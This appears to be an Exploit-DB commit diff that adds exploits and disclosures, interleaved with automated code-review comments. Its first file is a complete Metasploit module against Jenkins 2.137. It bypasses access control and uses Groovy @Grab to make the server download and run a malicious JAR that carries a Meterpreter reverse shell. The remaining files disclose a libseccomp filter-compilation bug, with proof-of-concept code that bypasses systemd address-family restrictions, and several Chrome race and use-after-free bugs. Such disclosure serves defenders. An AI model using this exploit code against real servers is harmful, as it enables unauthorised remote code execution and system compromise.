DB: 2019-03-20

16 changes to exploits/shellcodes

libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons
Google Chrome < M73 - Double-Destruction Race in StoragePartitionService
Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter
Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML
Microsoft VBScript - VbsErase Memory Corruption
Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject
Google Chrome < M73 - MidiManagerWin Use-After-Free
Google Chrome < M73 - FileSystemOperationRunner Use-After-Free

Advanced Host Monitor 11.92 beta - Local Buffer Overflow

Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)

TheCarProject v2 - Multiple SQL Injection
TheCarProject 2 - Multiple SQL Injection
Gila CMS 1.9.1 - Cross-Site Scripting
MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting
eNdonesia Portal 8.7 - Multiple Vulnerabilities
Netartmedia Event Portal 2.0 - 'Email' SQL Injection
Netartmedia PHP Mall 4.1 - SQL Injection
Netartmedia Real Estate Portal 5.0 - SQL Injection
Offensive Security 2019-03-20 05:01:53 +00:00
parent 2a394cba09
commit 2afed97ceb
17 changed files with 1247 additions and 1 deletions

exploits/java/remote/46572.rb Executable file

@ -0,0 +1,280 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',
'Description' => %q{
This module exploits a vulnerability in Jenkins dynamic routing to
bypass the Overall/Read ACL and leverage Groovy metaprogramming to
download and execute a malicious JAR file.
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
on later versions of Jenkins.
Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
},
'Author' => [
'Orange Tsai', # Discovery and PoC
'wvu' # Metasploit module
],
'References' => [
['CVE', '2019-1003000'], # Script Security
['CVE', '2019-1003001'], # Pipeline: Groovy
['CVE', '2019-1003002'], # Pipeline: Declarative
['EDB', '46427'],
['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],
['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']
],
'DisclosureDate' => '2019-01-08', # Public disclosure
'License' => MSF_LICENSE,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Targets' => [
['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',
'Version' => Gem::Version.new('2.137')
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
},
'Stance' => Stance::Aggressive # Be aggressive, b-e aggressive!
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
])
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
deregister_options('URIPATH')
end
=begin
http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
=end
def check
checkcode = CheckCode::Safe
res = send_request_cgi(
'method' => 'GET',
'uri' => go_go_gadget1('/search/index'),
'vars_get' => {'q' => 'a'}
)
unless res && (version = res.headers['X-Jenkins'])
vprint_error('Jenkins not detected')
return CheckCode::Unknown
end
vprint_status("Jenkins #{version} detected")
checkcode = CheckCode::Detected
if Gem::Version.new(version) > target['Version']
vprint_error("Jenkins #{version} is not a supported target")
return CheckCode::Safe
end
vprint_good("Jenkins #{version} is a supported target")
checkcode = CheckCode::Appears
if res.body.include?('Administrator')
vprint_good('ACL bypass successful')
checkcode = CheckCode::Vulnerable
else
vprint_error('ACL bypass unsuccessful')
return CheckCode::Safe
end
checkcode
end
def exploit
unless check == CheckCode::Vulnerable || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
# NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS
# HACK: Both HttpClient and HttpServer use datastore['SSL']
ssl = datastore['SSL']
datastore['SSL'] = false
start_service('Path' => '/')
datastore['SSL'] = ssl
print_status('Sending Jenkins and Groovy go-go-gadgets')
send_request_cgi(
'method' => 'GET',
'uri' => go_go_gadget1,
'vars_get' => {'value' => go_go_gadget2}
)
end
#
# Exploit methods
#
=begin
http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai
=end
def go_go_gadget1(custom_uri = nil)
# NOTE: See CVE-2018-1000408 for why we don't want to randomize the username
acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')
return normalize_uri(acl_bypass, custom_uri) if custom_uri
normalize_uri(
acl_bypass,
'/descriptorByName',
'/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
)
end
=begin
http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;
=end
def go_go_gadget2
(
<<~EOF
@GrabConfig(disableChecksums=true)
@GrabResolver('http://#{srvhost_addr}:#{srvport}/')
@Grab('#{vendor}:#{app}:#{version}')
import #{app}
EOF
).strip
end
#
# Payload methods
#
#
# If you deviate from the following sequence, you will suffer!
#
# HEAD /path/to/pom.xml -> 404
# HEAD /path/to/payload.jar -> 200
# GET /path/to/payload.jar -> 200
#
def on_request_uri(cli, request)
vprint_status("#{request.method} #{request.uri} requested")
unless %w[HEAD GET].include?(request.method)
vprint_error("Ignoring #{request.method} request")
return
end
if request.method == 'HEAD'
if request.uri != payload_uri
vprint_error('Sending 404')
return send_not_found(cli)
end
vprint_good('Sending 200')
return send_response(cli, '')
end
if request.uri != payload_uri
vprint_error('Sending bogus file')
return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
end
vprint_good('Sending payload JAR')
send_response(
cli,
payload_jar,
'Content-Type' => 'application/java-archive'
)
# XXX: $HOME may not work in some cases
register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")
end
def payload_jar
jar = payload.encoded_jar
jar.add_file("#{app}.class", exploit_class)
jar.add_file(
'META-INF/services/org.codehaus.groovy.plugins.Runners',
"#{app}\n"
)
jar.pack
end
=begin javac Exploit.java
import metasploit.Payload;
public class Exploit {
public Exploit(){
try {
Payload.main(null);
} catch (Exception e) { }
}
}
=end
def exploit_class
klass = Rex::Text.decode_base64(
<<~EOF
yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB
AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq
YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl
Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n
L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q
twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
AAAA
EOF
)
# Replace length-prefixed string "Exploit" with a random one
klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")
end
#
# Utility methods
#
def payload_uri
"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"
end
def vendor
@vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join
end
def app
@app ||= Faker::App.name.split(/[^[:alpha:]]/).join
end
def version
@version ||= Faker::App.semantic_version
end
end
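Review bot: in `exploit`, `datastore['SSL']` is forced to `false` around `start_service('Path' => '/')` and restored on the following line without an `ensure`, so if `start_service` raises (bind failure, port already in use) the user's SSL setting stays overridden for the rest of the session; wrap the restore as `begin ... ensure datastore['SSL'] = ssl end`. Minor, in `check`: the assignments `checkcode = CheckCode::Safe`, `checkcode = CheckCode::Detected` and `checkcode = CheckCode::Appears` are dead stores, because every early exit returns a literal (`CheckCode::Unknown`, `CheckCode::Safe`) and only the final `CheckCode::Vulnerable` value ever reaches the trailing `checkcode`; either drop them or return `checkcode` from each branch so the intermediate states mean something.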


@ -0,0 +1,282 @@
When libseccomp compiles filters for 64-bit systems, it needs to split 64-bit
comparisons into 32-bit comparisons because classic BPF can't operate on 64-bit
values directly.
libseccomp offers both bitwise comparisons (NE, EQ, MASKED_EQ) and arithmetic
comparisons (LT, LE, GE, GT). Bitwise comparisons can always be implemented with
no more than two comparisons; but that doesn't work for arithmetic comparisons.
Consider the case where a filter attempts to check whether
args[0]<0x123456789abc. The cases are:
args[0].high < 0x1234: matches
args[0].high > 0x1234: no match
args[0].high == 0x1234 && args[0].low < 0x56789abc: matches
args[0].high == 0x1234 && args[0].low >= 0x56789abc: no match
So in pseudocode, you'd want something like the following:
if args[0].high < 0x1234
return ACCEPT
if args[0].high > 0x1234
return REJECT
if args[0].low < 0x56789abc
return ACCEPT
return REJECT
But actually, when libseccomp is invoked as follows:
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
if (ctx == NULL) err(1, "seccomp_init");
if (seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADSLT), SCMP_SYS(mincore), 1,
SCMP_A0(SCMP_CMP_LT, 0x123456789abcUL)))
err(1, "seccomp_rule_add");
if (seccomp_load(ctx))
err(1, "seccomp_load");
it generates the following seccomp filter:
# ./seccomp_dump 96148 simple
===== filter 0 (13 instructions) =====
0001 if arch != X86_64: [true +10, false +0] -> ret KILL
0003 if nr < 0x40000000: [true +1, false +0]
0005 if nr != 0x0000001b: [true +5, false +0] -> ret ALLOW (syscalls: <TOO MANY TO LIST>)
0007 if args[0].high < 0x00001234: [true +2, false +0] -> ret ERRNO
0009 if args[0].low >= 0x56789abc: [true +1, false +0] -> ret ALLOW (syscalls: mincore)
000a ret ERRNO
[...]
As you can see, the case of `args[0].high > 0x1234 && args[0].low < 0x56789abc`
is handled incorrectly.
Here's a demo, tested with libseccomp from git master:
===========================================
jannh@jannh2:~/tests/libseccomp-stuff$ cat compare.c
#include <seccomp.h>
#include <err.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <sys/mman.h>
// any mincore() starting below this address should be denied with -EBADSLT
#define ADDR_LIMIT 0x123456789abcUL
static void sctest(unsigned long addr) {
unsigned char vec;
printf("mincore(0x%012lx, 0) = ", addr);
int res = mincore((void*)addr, 0, &vec);
if (res == 0) {
printf(" 0\n");
} else {
printf("-%d (%m)\n", errno);
}
}
int main(int argc, char **argv) {
setbuf(stdout, NULL);
printf("my pid is %d\n", (int)getpid());
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
if (ctx == NULL) err(1, "seccomp_init");
if (seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADSLT), SCMP_SYS(mincore), 1,
SCMP_A0(SCMP_CMP_LT, ADDR_LIMIT)))
err(1, "seccomp_rule_add");
if (seccomp_load(ctx))
err(1, "seccomp_load");
sctest(0);
sctest(0x123000000000);
sctest(0x1230f0000000);
sctest(0x123400000000);
sctest(0x123450000000);
sctest(0x123460000000);
sctest(0x1234f0000000);
sctest(0x123500000000);
sctest(0x1235f0000000);
sctest(0x123600000000);
while (1) pause();
}
jannh@jannh2:~/tests/libseccomp-stuff$ gcc -o compare compare.c -Wall -I/h/git/foreign/libseccomp/include/ -L/h/git/foreign/libseccomp/src/.libs -lseccomp -Wl,-rpath /h/git/foreign/libseccomp/src/.libs/
jannh@jannh2:~/tests/libseccomp-stuff$ ./compare
my pid is 104373
mincore(0x000000000000, 0) = -57 (Invalid slot)
mincore(0x123000000000, 0) = -57 (Invalid slot)
mincore(0x1230f0000000, 0) = -57 (Invalid slot)
mincore(0x123400000000, 0) = -57 (Invalid slot)
mincore(0x123450000000, 0) = -57 (Invalid slot)
mincore(0x123460000000, 0) = 0
mincore(0x1234f0000000, 0) = 0
mincore(0x123500000000, 0) = -57 (Invalid slot)
mincore(0x1235f0000000, 0) = 0
mincore(0x123600000000, 0) = -57 (Invalid slot)
===========================================
This probably isn't terribly interesting for most users of libseccomp, but the
Tor daemon
(https://gitweb.torproject.org/tor.git/tree/src/lib/sandbox/sandbox.c) does use
arithmetic comparisons to prevent writes to a certain memory region:
===========================================
/*
* Allow mprotect with PROT_READ|PROT_WRITE because openssl uses it, but
* never over the memory region used by the protected strings.
*
* PROT_READ|PROT_WRITE was originally fully allowed in sb_mprotect(), but
* had to be removed due to limitation of libseccomp regarding intervals.
*
* There is a restriction on how much you can mprotect with R|W up to the
* size of the canary.
*/
ret = seccomp_rule_add_3(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mprotect),
SCMP_CMP(0, SCMP_CMP_LT, (intptr_t) pr_mem_base),
SCMP_CMP(1, SCMP_CMP_LE, MALLOC_MP_LIM),
SCMP_CMP(2, SCMP_CMP_EQ, PROT_READ|PROT_WRITE));
[...]
ret = seccomp_rule_add_3(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mprotect),
SCMP_CMP(0, SCMP_CMP_GT, (intptr_t) pr_mem_base + pr_mem_size +
MALLOC_MP_LIM),
SCMP_CMP(1, SCMP_CMP_LE, MALLOC_MP_LIM),
SCMP_CMP(2, SCMP_CMP_EQ, PROT_READ|PROT_WRITE));
[...]
===========================================
systemd also has some code that uses arithmetic comparisons in
https://github.com/systemd/systemd/blob/master/src/shared/seccomp-util.c ,
specifically for two purposes:
- If you whitelist a range of address families for socket() using
RestrictAddressFamilies, anything outside that range gets blocked with
SCMP_CMP_LT/SCMP_CMP_GT.
- If you restrict the use of scheduling classes, anything above the permitted
class is blocked via SCMP_CMP_GT.
(Both of these, by the way, are for syscalls that silently discard the upper 32
bits of their arguments.)
The start of the second seccomp filter generated for a systemd unit with
"RestrictAddressFamilies=AF_INET AF_INET6" is:
===== filter 1 (57 instructions) =====
0001 if arch != X86_64: [true +54, false +0] -> ret ALLOW (syscalls: <TOO MANY TO LIST>)
0003 if nr < 0x40000000: [true +1, false +0]
0005 if nr != 0x00000029: [true +50, false +0] -> ret ALLOW (syscalls: <TOO MANY TO LIST>)
0007 if args[0].high != 0x00000000: [true +42, false +0]
0033 if args[0].high < 0x00000000: [true +3, false +0] -> ret ERRNO
0035 if args[0].low > 0x0000000a: [true +1, false +0] -> ret ERRNO
0036 if args[0].low >= 0x00000002: [true +1, false +0] -> ret ALLOW (syscalls: socket)
0037 ret ERRNO
So this filter will e.g. permit socket() calls in the range from 0x100000002 to
0x10000000a (and the kernel will ignore the high bit, meaning that in effect,
this filter grants access to families like AF_AX25); but as far as I can tell,
the other filter installed by systemd prevents this.
In the open-source users of libseccomp that I have been able to find on
codesearch.debian.net, this issue doesn't seem to have significant
impact; but someone might rely on this behavior, so I've decided to treat this
as a security bug.
##############################
Oh, I misread the other filter; that one applies to X32 only. So this actually has impact against systemd.
To reproduce on a Debian 10 machine:
Compile the following as /home/user/pause:
==========
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <stdio.h>
void try_socket(unsigned long family) {
errno = 0;
int res = syscall(SYS_socket, family, SOCK_STREAM, 0);
printf("socket for family 0x%lx: %d (%m)\n", family, res);
if (res >= 0) close(res);
}
int main(void) {
setbuf(stdout, NULL);
for (unsigned int i=0; i<20; i++) {
try_socket(i);
try_socket(i | 0x100000000UL);
}
while(1) pause();
}
==========
Create a systemd user service as follows:
==========
ser@deb10:~$ cat > .config/systemd/user/addrfam.service
[Unit]
Description=addrfam test
[Service]
ExecStart=/home/user/pause
RestrictAddressFamilies=AF_INET AF_INET6
SystemCallArchitectures=native
[Install]
WantedBy=default.target
user@deb10:~$ systemctl --user enable addrfam.service
Created symlink /home/user/.config/systemd/user/default.target.wants/addrfam.service → /home/user/.config/systemd/user/addrfam.service.
user@deb10:~$ systemctl --user start addrfam.service
user@deb10:~$
==========
And now look at "sudo journalctl | grep pause":
==========
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x0: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000000: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x1: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000001: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x2: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000002: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x3: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000003: -1 (Socket type not supported)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x4: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000004: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x5: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000005: -1 (Socket type not supported)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x6: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000006: -1 (Socket type not supported)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x7: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000007: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x8: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000008: -1 (Invalid argument)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x9: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000009: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xa: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000a: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xb: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000b: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xc: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000c: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xd: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000d: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xe: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000e: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xf: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000f: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000010: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x11: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000011: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x12: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000012: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x13: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000013: -1 (Address family not supported by protocol)
==========
As you can see, the normal socket() calls return "-1 (Address family not supported by protocol)" for everything other than AF_INET and AF_INET6; but with a bit set in the high half, e.g. AF_AX25 also works (returning "-1 (Socket type not supported)").
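Review bot: this file has no header block: unlike the other entries in this commit (the `# Exploit Title:` / `# Date:` / `# CVE:` lines of the Gila CMS and MyBB files), it opens directly with the write-up, so the affected versions (`libseccomp < 2.4.0`, stated only in the commit message), the author, the date and the original tracker URL appear nowhere in the file; add them above the first paragraph. The final impact assessment should also be stated up front: the first part concludes the issue "doesn't seem to have significant impact", and the addendum after the `####` rule reverses that ("So this actually has impact against systemd"), so a reader who stops early gets the wrong conclusion. Two smaller points: the `pause` program includes `<unistd.h>` twice (with `<sys/socket.h>` and `<errno.h>` between the two lines), and the `gcc` invocation hard-codes `/h/git/foreign/libseccomp/...` as include, library and rpath directories, which should be flagged as paths to adjust when building against a local libseccomp checkout.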


@ -0,0 +1,26 @@
There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService.
It looks like the root cause of the issue is that since we can get two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback() from the same BindingSet, which results in a data race destroying the same BindingState.
One case where this can be called is in a synchronous context when validating a received message, or when tearing down the connection. The other context is the callback passed to OpenSessionStorage here
https://cs.chromium.org/chromium/src/content/browser/storage_partition_impl.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=912
This is then posted to the mojo task runner thread here:
https://cs.chromium.org/chromium/src/content/browser/dom_storage/dom_storage_context_wrapper.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=433
And can be called on this thread directly here:
https://cs.chromium.org/chromium/src/content/browser/dom_storage/session_storage_context_mojo.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=140
Since this is a tight race, the repro is not terribly reliable. Opening multiple tabs at once will increase your chances of reproducing to the point where the issue triggers around 50% of the time (on my machine, mileage will vary depending on system load etc...). I found the most convenient way to reproduce was to use a ThreadSanitizer build, but since the most common result is a double-free, this will often crash a normal release build when the freelist corruption is detected.
$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Tsan/chrome --enable-blink-features=MojoJS
--no-sandbox --user-data-dir=/tmp/aa 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html'
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46565.zip
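Review bot: the repro commands disagree about which build they target: `copy_mojo_js_bindings.py` is pointed at `out/Asan/gen` while the browser launched is `out/Tsan/chrome`, so a reader following them verbatim loads MojoJS bindings generated for a different build; use the same output directory in both commands (the write-up itself says a ThreadSanitizer build is the most convenient way to reproduce). The file also carries none of the header metadata the other entries have (title, affected version, author, date, tracker reference), so the only statement of the affected version (`< M73`) is the commit message.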


@ -0,0 +1,31 @@
There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently.
See the comment in the code:
ExtensionsGuestViewMessageFilter::~ExtensionsGuestViewMessageFilter() {
DCHECK_CURRENTLY_ON(BrowserThread::IO);
// This map is created and accessed on the UI thread. Remove the reference to
// |this| here so that it will not be accessed again; but leave erasing the
// key from the global map to UI thread to avoid races when accessing the
// underlying data structure (https:/crbug.com/869791).
(*GetProcessIdToFilterMap())[render_process_id_] = nullptr;
base::PostTaskWithTraits(
FROM_HERE, BrowserThread::UI,
base::BindOnce(RemoveProcessIdFromGlobalMap, render_process_id_));
}
This comment doesn't describe behaviour that appears to be safe to me - there's no explicit mention of the safety of concurrent modification of base::flat_map; but it is noted that iterators are invalidated on insertion/erase, so as there is no further synchronisation, it doesn't appear that it is safe to read or write from this map if another thread may be concurrently modifying it.
This issue was detected by TSAN during fuzzing; but I don't think the behaviour is related to the fuzz case - it's just a dormant issue that was caught. I've attached the TSAN splat that resulted, but I don't have a reliable testcase to reproduce this issue.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Ah, you can reproduce this quite easily without even having a compromised renderer. Before I submitted the report to Chrome I thought I should try just spawning lots of renderers, and that repros fairly quickly - still the same (benign, I think) race that's occuring, but that's unsurprising since the renderers in this case aren't doing anything. The attached testcase triggers in < 5 min with a TSAN build.
The testcase assumes that the domains test0.com - test63.com all resolve to your local server.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46566.zip
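Review bot: the tracker boilerplate (`This bug is subject to a 90 day disclosure deadline...`) sits between the original report and the follow-up comment (`Ah, you can reproduce this quite easily...`), which makes the follow-up read as a continuation of the boilerplate; move it to the top or bottom of the file, or mark the follow-up as a later comment. Two things to verify: the crbug link inside the quoted destructor comment is written `https:/crbug.com/869791` with a single slash, which should be checked against the Chromium source or corrected, and `occuring` in the follow-up is a typo for `occurring`.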


@ -0,0 +1,15 @@
MidiManagerWin uses a similar instance_id mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive.
However, this instance_id is an int, and there is no check that it hasn't overflowed, unlike in the linux and mac implementations (MidiManagerAlsa), see https://cs.chromium.org/chromium/src/media/midi/midi_manager_alsa.cc?rcl=282aae73b9d2c1cbf12d3c39a8d3d2612e4b1876&l=175
This means that if (for example) a delayed sendData on a stale MidiManagerWin instance is queued up, and then the instance id is wrapped, this will trigger a use-after-free when that task triggers.
This bug would be theoretically reachable directly from javascript, but I think that since it's not possible to directly tear down a midi session using the WebMIDI api that this would require too much time to be feasible (as it would require creating a new frame for every increment). However, it can be triggered in a reasonable amount of time from a compromised renderer making direct Mojo calls.
The timing required for the resulting code is quite sensitive to changes in the order of Mojo messages being received; my original approach needed 6 months, but I have the time needed to cause the overflow down to ~4 days from a compromised renderer using the MojoJS javascript bindings.
I've attached a PoC (using the MojoJS bindings) that demonstrates the issue in a more convenient amount of time for testing if you patch the variable `static int id` in IssueNextInstanceId to a `static short`. Runtime will also be shorter if you run the PoC directly after booting; it also has to synchronise clocks with the system clock, and I haven't put any work into making that quick.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46570.zip
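Review bot: the statement that the overflow check exists in "the linux and mac implementations" is only supported for Linux: the single reference is `midi_manager_alsa.cc` (`MidiManagerAlsa`) and no Mac source is cited, so either add the reference to the Mac implementation or narrow the sentence to ALSA. The sentence `my original approach needed 6 months, but I have the time needed to cause the overflow down to ~4 days` is missing a verb (`have got` / `have brought`). As with the other Chrome entries, the file has no header naming the affected version (`< M73` appears only in the commit message).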


@ -0,0 +1,51 @@
There's a comment in FileSystemOperationRunner::BeginOperation
OperationID FileSystemOperationRunner::BeginOperation(
std::unique_ptr<FileSystemOperation> operation) {
OperationID id = next_operation_id_++;
// TODO(https://crbug.com/864351): Diagnostic to determine whether OperationID
// wrap-around is occurring in the wild.
DCHECK(operations_.find(id) == operations_.end());
// ! If id already in operations_, this will free operation
operations_.emplace(id, std::move(operation));
return id;
}
The id is an int, and it can wrap, and if it does this will cause a use-after-free in the browser process, since the normal usage of BeginOperation is the following:
OperationID FileSystemOperationRunner::Truncate(const FileSystemURL& url,
int64_t length,
StatusCallback callback) {
base::File::Error error = base::File::FILE_OK;
std::unique_ptr<FileSystemOperation> operation = base::WrapUnique(
file_system_context_->CreateFileSystemOperation(url, &error));
// ! take a raw pointer to the contents of the unique_ptr
FileSystemOperation* operation_raw = operation.get();
// ! call BeginOperation passing the move'd unique_ptr, freeing operation
OperationID id = BeginOperation(std::move(operation));
base::AutoReset<bool> beginning(&is_beginning_operation_, true);
if (!operation_raw) {
DidFinish(id, std::move(callback), error);
return id;
}
PrepareForWrite(id, url);
// ! use the raw free'd pointer here.
operation_raw->Truncate(url, length,
base::BindOnce(&FileSystemOperationRunner::DidFinish,
weak_ptr_, id, std::move(callback)));
return id;
}
I think that to trigger this, you'd need either a malformed blob in the blob registry, or access to the FileWriter api, so at present this would require a compromised renderer.
I've attached two PoCs that should trigger this issue; it looks like the runtime for either approach from javascript should take ~2 days on my machine. (I'd suggest patching the OperationId typedef to short to reproduce, unless you are extremely patient).
$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Asan/chrome --enable-blink-features=MojoJS --user-data-dir=/tmp/aa 'http://localhost:8000/id_overflow_no_filewriter.html'
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46571.zip
